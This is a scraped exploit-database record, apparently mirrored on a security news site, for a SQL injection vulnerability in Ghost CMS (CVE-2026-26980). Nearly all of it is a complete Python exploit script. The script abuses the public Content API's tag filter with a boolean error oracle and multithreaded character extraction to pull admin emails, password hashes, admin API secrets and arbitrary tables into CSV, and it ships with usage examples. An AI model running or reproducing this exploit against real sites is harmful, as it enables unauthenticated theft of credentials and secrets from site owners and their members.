{“lastseen”:”2026-05-07T15:27:58″,”description”:”Exploit Title: Ghost CMS 6.19.0 – SQLi Date: 2026-03-30 Exploit Author: Maksim Rogov Exploit Licence: GPL-3.0 Software Link: https:\/\/ghost.org\/ Version: Ghost =3D 3.24.0, =3D 6.19.0 Tested on: Ghost 6.16.1 CVE : CVE-2026-26980 !\/usr\/bin\/env python3…”,”published”:”2026-05-07T00:00:00″,”modified”:”2026-05-07T00:00:00″,”type”:”exploitdb”,”title”:”Ghost CMS 6.19.0 – SQLi”,”source”:””,”references”:””,”id”:”EDB-ID:52555″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-26980″],”sourceData”:”# Exploit Title: Ghost CMS 6.19.0 – SQLi\\r\\n# Date: 2026-03-30\\r\\n# Exploit Author: Maksim Rogov\\r\\n# Exploit Licence: GPL-3.0\\r\\n# Software Link: https:\/\/ghost.org\/\\r\\n# Version: Ghost \\u003e=3D 3.24.0, \\u003c=3D 6.19.0\\r\\n# Tested on: Ghost 6.16.1\\r\\n# CVE : CVE-2026-26980\\r\\n\\r\\n#!\/usr\/bin\/env python3\\r\\n\\r\\nimport requests\\r\\nimport re\\r\\nimport sys\\r\\nimport argparse\\r\\nimport textwrap\\r\\nimport csv\\r\\nfrom typing import Optional\\r\\nfrom concurrent.futures import ThreadPoolExecutor\\r\\nfrom urllib.parse import urljoin, urlparse\\r\\n\\r\\nCHARSET =3D \\”\\”.join(sorted(set(\\”$.\/0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ_ab=\\r\\ncdefghijklmnopqrstuvwxyz@!#%^\\u0026*()+-=3D\\”)))\\r\\nERROR_INDICATOR =3D \\”InternalServerError\\”=20\\r\\nDEFAULT_THREADS =3D 15\\r\\n\\r\\ndef to_char_hex(s: str):\\r\\n return \\”||\\”.join([f\\”char({ord(c)})\\” for c in s])\\r\\n\\r\\nclass GhostExploit:\\r\\n def __init__(self, target_url: str, threads: int =3D DEFAULT_THREADS, d=\\r\\nbms: str =3D \\”sqlite\\”, output: str =3D None, user_cols: str =3D None, verif=\\r\\ny: bool =3D True, manual_key: str =3D None, manual_path: str =3D None):\\r\\n self.target =3D target_url.rstrip(‘\/’)\\r\\n self.threads =3D threads\\r\\n self.dbms =3D dbms.lower()\\r\\n self.output =3D output\\r\\n self.user_cols =3D [c.strip() for c in user_cols.split(‘,’)] if use=\\r\\nr_cols else None\\r\\n self.session =3D requests.Session()\\r\\n self.session.verify =3D verify\\r\\n self.manual_key =3D manual_key\\r\\n self.manual_path =3D manual_path\\r\\n if not verify:\\r\\n import urllib3\\r\\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarn=\\r\\ning)\\r\\n self.api_key, self.endpoint, self.tag_slug, self.tag_id, self.url_t=\\r\\nemplate =3D \\”\\”, \\”\\”, \\”\\”, \\”\\”, \\”\\”\\r\\n\\r\\n def discover(self) -\\u003e bool:\\r\\n try:\\r\\n if self.manual_key and self.manual_path:\\r\\n self.api_key =3D self.manual_key\\r\\n self.endpoint =3D urljoin(self.target, self.manual_path)\\r\\n if not self.endpoint.endswith(‘\/’): self.endpoint +=3D ‘\/’\\r\\n else:\\r\\n r =3D self.session.get(self.target, timeout=3D10)\\r\\n self.api_key =3D re.search(r’data-key=3D\\”([a-f0-9]+)\\”‘, r.t=\\r\\next).group(1)\\r\\n api_raw =3D re.search(r’data-api=3D\\”([^\\”]+)\\”‘, r.text).grou=\\r\\np(1)\\r\\n path =3D urlparse(api_raw).path\\r\\n self.endpoint =3D urljoin(self.target, path)\\r\\n if not self.endpoint.endswith(‘\/’): self.endpoint +=3D ‘\/’\\r\\n\\r\\n r_tags =3D self.session.get(f\\”{self.endpoint}tags\/?key=3D{self.=\\r\\napi_key}\\”, timeout=3D10).json()\\r\\n tag =3D r_tags[‘tags’][0]\\r\\n self.tag_slug, self.tag_id =3D tag[‘slug’], tag[‘id’]\\r\\n self.url_template =3D f\\”{self.endpoint}tags\/?key=3D{self.api_ke=\\r\\ny}\\u0026filter=3Dslug:[‘*’,{self.tag_slug}]\\u0026limit=3Dall\\”\\r\\n return True\\r\\n except:=20\\r\\n return False\\r\\n\\r\\n def check(self, cond: str) -\\u003e bool:\\r\\n if self.dbms =3D=3D \\”mysql\\”:\\r\\n err_payload =3D \\”(SELECT exp(710))\\”\\r\\n else:\\r\\n err_payload =3D \\”(SELECT abs(-9223372036854775808))\\”\\r\\n\\r\\n payload =3D f\\” OR ({cond}) THEN {err_payload} WHEN slug=3D\\”\\r\\n try:\\r\\n r =3D self.session.get(self.url_template.replace(\\”*\\”, payload, =\\r\\n1), timeout=3D7)\\r\\n return \\”badrequesterror\\” in r.text.lower() or ERROR_INDICATOR.l=\\r\\nower() in r.text.lower()\\r\\n except: return False\\r\\n\\r\\n def get_len(self, query: str) -\\u003e int:\\r\\n length =3D 0\\r\\n for bit in [64, 32, 16, 8, 4, 2, 1]:\\r\\n if self.check(f\\”LENGTH(({query}))\\u003e=3D{length + bit}\\”): length +=\\r\\n=3D bit\\r\\n return length\\r\\n\\r\\n def get_char(self, query: str, pos: int) -\\u003e str:\\r\\n low, high =3D 0, len(CHARSET) – 1\\r\\n while low \\u003c high:\\r\\n mid =3D (low + high) \/\/ 2\\r\\n char_code =3D ord(CHARSET[mid + 1])\\r\\n =20\\r\\n if self.dbms =3D=3D \\”mysql\\”:\\r\\n cond =3D f\\”ASCII(SUBSTR(({query}) FROM {pos} FOR 1))\\u003e=3D{ch=\\r\\nar_code}\\”\\r\\n else:\\r\\n prefix =3D \\”||\\”.join([\\”char(63)\\”] * (pos – 1))\\r\\n c_range =3D f\\”char(91)||char({char_code})||char(45)||char({=\\r\\nord(CHARSET[-1])})||char(93)\\”\\r\\n cond =3D f\\”({query}) GLOB {prefix}||{c_range}||char(42)\\” if=\\r\\n prefix else f\\”({query}) GLOB {c_range}||char(42)\\”\\r\\n\\r\\n if self.check(cond): low =3D mid + 1\\r\\n else: high =3D mid\\r\\n return CHARSET[low]\\r\\n\\r\\n def extract(self, query: str, label: str, force_len: int =3D None) -\\u003e s=\\r\\ntr:\\r\\n length =3D force_len if force_len is not None else self.get_len(que=\\r\\nry)\\r\\n if length \\u003c=3D 0: return \\”\\”\\r\\n =20\\r\\n chars =3D [\\”\\”] * length\\r\\n with ThreadPoolExecutor(max_workers=3Dself.threads) as ex:\\r\\n futures =3D {ex.submit(self.get_char, query, i+1): i for i in r=\\r\\nange(length)}\\r\\n for f in futures:\\r\\n chars[futures[f]] =3D f.result()\\r\\n sys.stdout.write(f\\”\\\\r {label} ({length} chars): {”.join(c=\\r\\n if c else ‘.’ for c in chars)}\\”)\\r\\n sys.stdout.flush()\\r\\n res =3D \\”\\”.join(chars)\\r\\n sys.stdout.write(f\\”\\\\r {label} ({length} chars): {res}\\\\n\\”)\\r\\n return res\\r\\n\\r\\n def print_table(self, columns, rows):\\r\\n if not rows: return\\r\\n widths =3D {col: len(col) for col in columns}\\r\\n for row in rows:\\r\\n for col in columns:\\r\\n widths[col] =3D max(widths[col], len(str(row.get(col, \\”\\”)))=\\r\\n)\\r\\n\\r\\n sep =3D \\”+\\” + \\”+\\”.join([\\”-\\” * (widths[col] + 2) for col in columns]=\\r\\n) + \\”+\\”\\r\\n head =3D \\”|\\” + \\”|\\”.join([f\\” {col.ljust(widths[col])} \\” for col in c=\\r\\nolumns]) + \\”|\\”\\r\\n =20\\r\\n print(\\”\\\\n\\” + sep)\\r\\n print(head)\\r\\n print(sep)\\r\\n for row in rows:\\r\\n line =3D \\”|\\” + \\”|\\”.join([f\\” {str(row.get(col, ”)).ljust(widths=\\r\\n[col])} \\” for col in columns]) + \\”|\\”\\r\\n print(line)\\r\\n print(sep + \\”\\\\n\\”)\\r\\n\\r\\n def dump_table(self, table_name: str):\\r\\n print(f\\”\\\\n[*] Dumping table: {table_name}\\”)\\r\\n cast_type =3D \\”CHAR\\” if self.dbms =3D=3D \\”mysql\\” else \\”TEXT\\”\\r\\n =20\\r\\n count_str =3D self.extract(f\\”SELECT CAST(COUNT(*) AS {cast_type}) F=\\r\\nROM {table_name}\\”, \\”Total records\\”)\\r\\n count =3D int(count_str) if count_str.isdigit() else 0\\r\\n if count =3D=3D 0:=20\\r\\n print(\\”[!] No records found or table doesn’t exist.\\”)\\r\\n return\\r\\n\\r\\n if self.user_cols:\\r\\n columns =3D self.user_cols\\r\\n print(f\\”[*] Using user-defined columns: {‘, ‘.join(columns)}\\”)\\r\\n elif self.dbms =3D=3D \\”sqlite\\”:\\r\\n t_name_char =3D to_char_hex(table_name)\\r\\n schema_query =3D f\\”SELECT sql FROM sqlite_master WHERE name=3D{=\\r\\nt_name_char}\\”\\r\\n cols_raw =3D self.extract(schema_query, \\”Schema\\”)\\r\\n columns =3D re.findall(r'([a-zA-Z_]+)\\\\s+(?:TEXT|VARCHAR|INT|DAT=\\r\\nETIME|TIMESTAMP|BOOLEAN)’, cols_raw, re.I)\\r\\n else:\\r\\n columns =3D [‘id’, ’email’, ‘name’, ‘password’, ‘status’]\\r\\n\\r\\n if not columns: columns =3D [‘id’, ’email’]\\r\\n =20\\r\\n all_rows =3D []\\r\\n for i in range(count):\\r\\n print(f\\”\\\\n — Record #{i+1} —\\”)\\r\\n current_row =3D {}\\r\\n for col in columns:\\r\\n val =3D self.extract(f\\”SELECT {col} FROM {table_name} LIMIT=\\r\\n 1 OFFSET {i}\\”, col)\\r\\n current_row[col] =3D val\\r\\n all_rows.append(current_row)\\r\\n =20\\r\\n self.print_table(columns, all_rows)\\r\\n\\r\\n if self.output:\\r\\n try:\\r\\n with open(self.output, ‘w’, newline=3D”, encoding=3D’utf-8=\\r\\n’) as f:\\r\\n writer =3D csv.DictWriter(f, fieldnames=3Dcolumns)\\r\\n writer.writeheader()\\r\\n writer.writerows(all_rows)\\r\\n print(f\\”[+] Exported to {self.output}\\”)\\r\\n except Exception as e:\\r\\n print(f\\”[!] Export error: {e}\\”)\\r\\n\\r\\n def run(self, table_to_dump: Optional[str] =3D None):\\r\\n if not self.discover():\\r\\n print(\\”[!] Discovery failed.\\”)\\r\\n return\\r\\n =20\\r\\n print(\\”=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=\\r\\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=\\r\\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\\”)\\r\\n print(f\\”Ghost CMS – Unauthenticated SQLi Data Extraction\\”)\\r\\n print(f\\”Target: {self.target}\\”)\\r\\n print(f\\”API Key: {self.api_key}\\”)\\r\\n print(f\\”Tag ID: {self.tag_id}\\”)\\r\\n print(\\”Endpoint: Content API (public, no auth)\\”)\\r\\n print(\\”=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=\\r\\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=\\r\\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\\”)\\r\\n\\r\\n print(\\”\\\\n[*] Calibrating oracle… OK\\”)\\r\\n if not self.check(\\”1=3D1\\”):=20\\r\\n print(\\”[!] Oracle calibration failed.\\”)\\r\\n return\\r\\n\\r\\n if table_to_dump:\\r\\n self.dump_table(table_to_dump)\\r\\n else:\\r\\n print(\\”\\\\n[*] Phase 1: Recon (fast checks)\\”)\\r\\n l_email =3D self.get_len(\\”SELECT email FROM users LIMIT 1\\”)\\r\\n print(f\\” length(users.email) =3D {l_email}\\”)\\r\\n l_pass =3D self.get_len(\\”SELECT password FROM users LIMIT 1\\”)\\r\\n print(f\\” length(users.password) =3D {l_pass}\\”)\\r\\n l_name =3D self.get_len(\\”SELECT name FROM users LIMIT 1\\”)\\r\\n print(f\\” length(users.name) =3D {l_name}\\”)\\r\\n l_status =3D self.get_len(\\”SELECT status FROM users LIMIT 1\\”)\\r\\n print(f\\” length(users.status) =3D {l_status}\\”)\\r\\n\\r\\n for t in [\\”users\\”, \\”members\\”, \\”api_keys\\”, \\”sessions\\”]:\\r\\n cast_t =3D \\”CHAR\\” if self.dbms =3D=3D \\”mysql\\” else \\”TEXT\\”\\r\\n self.extract(f\\”SELECT CAST(COUNT(*) AS {cast_t}) FROM {t}\\”,=\\r\\n f\\”count({t})\\”)\\r\\n\\r\\n print(\\”\\\\n[*] Phase 2: Extracting values\\”)\\r\\n self.extract(\\”SELECT email FROM users LIMIT 1\\”, \\”Admin email\\”, =\\r\\nl_email)\\r\\n self.extract(\\”SELECT name FROM users LIMIT 1\\”, \\”Admin name\\”, l_=\\r\\nname)\\r\\n =20\\r\\n adm_type =3D to_char_hex(\\”admin\\”)\\r\\n self.extract(f\\”SELECT id FROM api_keys WHERE type=3D{adm_type} =\\r\\nLIMIT 1\\”, \\”Admin API key ID\\”)\\r\\n self.extract(f\\”SELECT secret FROM api_keys WHERE type=3D{adm_ty=\\r\\npe} LIMIT 1\\”, \\”Admin API secret\\”)\\r\\n self.extract(\\”SELECT password FROM users LIMIT 1\\”, \\”Password ha=\\r\\nsh\\”, l_pass)\\r\\n\\r\\nif __name__ =3D=3D \\”__main__\\”:\\r\\n parser =3D argparse.ArgumentParser(\\r\\n formatter_class=3Dargparse.RawDescriptionHelpFormatter,=20\\r\\n epilog=3Dtextwrap.dedent(\\”\\”\\”\\r\\n Usage Examples:\\r\\n python3 main.py -u http:\/\/target.com\\r\\n (Quickly extract Admin email and Password Hash from a default S=\\r\\nQLite setup)\\r\\n\\r\\n python3 main.py -u http:\/\/target.com -d mysql -T users -C email=\\r\\n,password -o .\/result.csv\\r\\n (Dump of ’email’ and ‘password’ columns from the ‘users’ table)\\r\\n\\r\\n python3 main.py -u http:\/\/target.com -d mysql -T api_keys -t 25\\r\\n (Dump all site api keys from ‘api_keys’ table using 25 threads)\\r\\n\\r\\n Note: Most production Ghost instances use MySQL. Local\/Small bl=\\r\\nogs use SQLite.\\r\\n \\”\\”\\”)\\r\\n )\\r\\n parser.add_argument(\\”-u\\”, \\”–url\\”, required=3DTrue, metavar=3D\\”URL\\”, he=\\r\\nlp=3D\\”The base URL of the target Ghost\\”)\\r\\n parser.add_argument(\\”–api-key\\”, metavar=3D\\”KEY\\”, help=3D\\”Ghost Content=\\r\\n API Key (skips auto-discovery)\\”)\\r\\n parser.add_argument(\\”-p\\”, \\”–api-path\\”, metavar=3D\\”PATH\\”, help=3D\\”Conte=\\r\\nnt API path (e.g., \/ghost\/api\/content\/)\\”)\\r\\n parser.add_argument(\\”-k\\”, \\”–insecure\\”, action=3D\\”store_true\\”, help=3D\\”=\\r\\nAllow insecure server connections when using SSL (ignore SSL certificate er=\\r\\nrors)\\”)\\r\\n parser.add_argument(\\”-t\\”, \\”–threads\\”, type=3Dint, default=3DDEFAULT_TH=\\r\\nREADS, metavar=3D\\”N\\”, help=3Df\\”Number of concurrent threads for faster extr=\\r\\naction (default: {DEFAULT_THREADS})\\”)\\r\\n parser.add_argument(\\”-d\\”, \\”–dbms\\”, default=3D\\”sqlite\\”, choices=3D[\\”sql=\\r\\nite\\”, \\”mysql\\”], help=3D\\”The database engine Ghost is running on. Default: s=\\r\\nqlite\\”)\\r\\n parser.add_argument(\\”-T\\”, \\”–table\\”, metavar=3D\\”NAME\\”, help=3D\\”Specific=\\r\\n database table to dump (e.g., users, api_keys, members, posts)\\”)\\r\\n parser.add_argument(\\”-C\\”, \\”–columns\\”, metavar=3D\\”COL1,COL2\\”, help=3D\\”S=\\r\\npecific columns to extract (comma separated)\\”)\\r\\n parser.add_argument(\\”-o\\”, \\”–output\\”, metavar=3D\\”FILE\\”, help=3D\\”Save re=\\r\\nsults to CSV file\\”)\\r\\n args =3D parser.parse_args()\\r\\n =20\\r\\n try:\\r\\n exploit =3D GhostExploit(args.url, args.threads, args.dbms, args.ou=\\r\\ntput, args.columns, not args.insecure, args.api_key, args.api_path)\\r\\n exploit.run(args.table)\\r\\n except KeyboardInterrupt:\\r\\n print(\\”\\\\n[!] Aborted\\”)”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52555″,”cvss”:{“score”:9.4,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:L”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52555″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-07T15:27:58″,”description”:”Exploit Title: Ghost CMS 6.19.0 – SQLi Date: 2026-03-30 Exploit Author: Maksim Rogov Exploit Licence: GPL-3.0 Software Link: https:\/\/ghost.org\/ Version: Ghost =3D 3.24.0, =3D 6.19.0…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,131,12,40,13,7,11,5],"class_list":["post-52109","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-94","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n